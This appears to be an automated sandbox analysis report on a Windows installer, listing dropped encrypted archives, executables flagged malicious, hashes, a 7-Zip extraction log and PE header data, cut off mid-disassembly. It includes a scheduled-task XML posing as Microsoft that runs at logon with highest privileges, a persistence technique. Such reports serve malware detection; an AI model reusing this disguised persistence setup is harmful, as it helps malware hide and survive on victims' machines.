                                                        Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):31890
                                                        Entropy (8bit):7.99402458740637
                                                        Encrypted:true
                                                        SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                                        MD5:8622FC7228777F64A47BD6C61478ADD9
                                                        SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                                        SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                                        SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                                        Malicious:false
                                                        Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):31890
                                                        Entropy (8bit):7.99402458740637
                                                        Encrypted:true
                                                        SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                                        MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                                        SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                                        SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                                        SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                                        Malicious:false
                                                        Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):74960
                                                        Entropy (8bit):7.99759370165655
                                                        Encrypted:true
                                                        SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                                        MD5:950338D50B95A25F494EE74E97B7B7A9
                                                        SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                                        SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                                        SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                                        Malicious:false
                                                        Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):74960
                                                        Entropy (8bit):7.997593701656546
                                                        Encrypted:true
                                                        SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                                        MD5:059BA7C31F3E227356CA5F29E4AA2508
                                                        SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                                        SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                                        SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                                        Malicious:false
                                                        Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):29730
                                                        Entropy (8bit):7.994290657653607
                                                        Encrypted:true
                                                        SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                                        MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                                        SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                                        SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                                        SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                                        Malicious:false
                                                        Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):29730
                                                        Entropy (8bit):7.994290657653608
                                                        Encrypted:true
                                                        SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                                        MD5:A9C8A3E00692F79E1BA9693003F85D18
                                                        SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                                        SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                                        SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                                        Malicious:false
                                                        Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):249984
                                                        Entropy (8bit):7.999231321310215
                                                        Encrypted:true
                                                        SSDEEP:3072:bq197wBcGJFKwAA/THosHch/5mC8rR2rUPXPMzBQZ3N0AVebaKsjBL2Itvz38sho:e2ckFr8h/5Ct2rUM1QVdw+KeySr3Fet
                                                        MD5:F81297786EB640B840BB7B630C00C588
                                                        SHA1:6B29628368E57D349B617755224ABB6A17FA61EF
                                                        SHA-256:ED33C18470A3C637FF0EA85152913C814CB959AC3F6C95AB505E7BD70C6D218F
                                                        SHA-512:45990D001BDB62654086B6D9D59B6D1545104DCC8C4D6D9D5F6B2A88F986C097A637F726DD56A23AA9538E9BC03ABE4AD9B159F61BF61D21B4CB21C4FDD7FB26
                                                        Malicious:false
                                                        Preview:7z..'...... .......@..........inxr.f\....../_...]...T...N@w[..1.A.f..e+.G.F...d]r.'sO:..B.....My.a.M.....gL.Q..}fI."H......cj........nu...4.y.J`....\,+sxS.e...o...o.n}..K|j},.Oh....l6[.-..a......C..f}.u....P..Q6]...XN..<2p....&r..qV..'...BV.t............l..1...../qq.v.V.^.6....a.)e.R..fr$.:G?.3....)..M..n.B.c..o.uC..y..........Z...u..9V.JE.>....x.f0@.E...>...r.r.W.............D..z.... ..D...*:.n.J.%..?.....E.a..j.............-...1....X..aRC>.2.,..0k...D.3+?..'.J.r...Q..#E.nH..;.>../JL.9&J<.$q......7.B.u...........yB......<....?...`._I.6.g.G.o.....H5.y.........w..qv..#(..v..?U..n..=..|...s..??\...F...Q.\k..v.m K....A..:....kY$......0g7#.5.|.W...M..b.d........j..........$..O....!.|N[=.P};.j..c....tJ&......p..cC.T...ai.....sJ...../..f .+.HD5.P(.nI..P[.T.*.....y..'../9..]_...`...SYc.IlK.7.f..j...J..pWF...z.<...w..!:.;f.U.~.3.J.@C.:.......ZB*.l.....%.....t"..4.".\.jA...sZ=.W.(<...aH.,E.k..:.......:.H.F4.?.E..O.oi..y...0.e.G.B....Ov.l...........
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):63640
                                                        Entropy (8bit):6.482810107683822
                                                        Encrypted:false
                                                        SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                                        MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                                        SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                                        SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                                        SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4096
                                                        Entropy (8bit):3.347034835751068
                                                        Encrypted:false
                                                        SSDEEP:48:dXKLzDlnlL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlncwhldOVQOj6dKbKsz7
                                                        MD5:062A3AACBCFA04B7986F0AAB0F7767C0
                                                        SHA1:FD7A28C2D6B030B8E15622CEFFD824224F684973
                                                        SHA-256:F46F7F3F8B4763B62B3B2E02E24B0300E3AB741DD3770F93FCFE7D1A26B1C46D
                                                        SHA-512:9F0435883F31D801EFEC0A378473566F68CDD0DA9FBC36F2B431380D8E852E297891BD3AFC952E90CC5ED01C9041C79402FD774BFE98B036D73F9FDD65771B79
                                                        Malicious:false
                                                        Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5649408
                                                        Entropy (8bit):6.392614480390128
                                                        Encrypted:false
                                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1628158735648508
                                                        Encrypted:false
                                                        SSDEEP:3:Nllluldhz/lL:NllU
                                                        MD5:03744CE5681CB7F5E53A02F19FA22067
                                                        SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                        SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                        SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                        Malicious:false
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3366912
                                                        Entropy (8bit):6.530548291878271
                                                        Encrypted:false
                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6144
                                                        Entropy (8bit):4.720366600008286
                                                        Encrypted:false
                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Process:C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6144
                                                        Entropy (8bit):4.720366600008286
                                                        Encrypted:false
                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):406
                                                        Entropy (8bit):5.117520345541057
                                                        Encrypted:false
                                                        SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                                        MD5:9200058492BCA8F9D88B4877F842C148
                                                        SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                                        SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                                        SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                                        Malicious:false
                                                        Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.921329426572819
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                                        • Inno Setup installer (109748/4) 1.08%
                                                        • InstallShield setup (43055/19) 0.42%
                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                        File name:#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                        File size:5'707'472 bytes
                                                        MD5:c17bd872bfa6b9e26aa03ad02ceaaca0
                                                        SHA1:a2cc5d1e3526ad5b415ba875b12e1e42d48411ce
                                                        SHA256:43a0b8a907d46b77e8695c8c00f90a6812f9bdb138d2ae53c1ce0d9b4362e610
                                                        SHA512:16c469e4e465b49c65d248cbc255e14f10e592c69f34284027a459839a129eb37ca75535369993a8d2aa8ce211e5b35974e13f64632257b37efd468b98d61f5f
                                                        SSDEEP:98304:XwREaHL2dH4jfHA43cQSl6GZkZmRzbmeoDWgo6UqI3J+LZotAVtfc0MJsI1dMwZO:lWmH4jfH7dSl6GZkM1Keo6gPUJOoiPMU
                                                        TLSH:98461222F3CBE43EE05D1B3716B2A25494FB7A606522AD5396ECB4ACCF350601D3E647
                                                        Icon Hash:0c0c2d33ceec80aa
                                                        Entrypoint:0x4a83bc
                                                        Entrypoint Section:.itext
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:6
                                                        OS Version Minor:1
                                                        File Version Major:6
                                                        File Version Minor:1
                                                        Subsystem Version Major:6
                                                        Subsystem Version Minor:1
                                                        Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add esp, FFFFFFA4h
                                                        push ebx
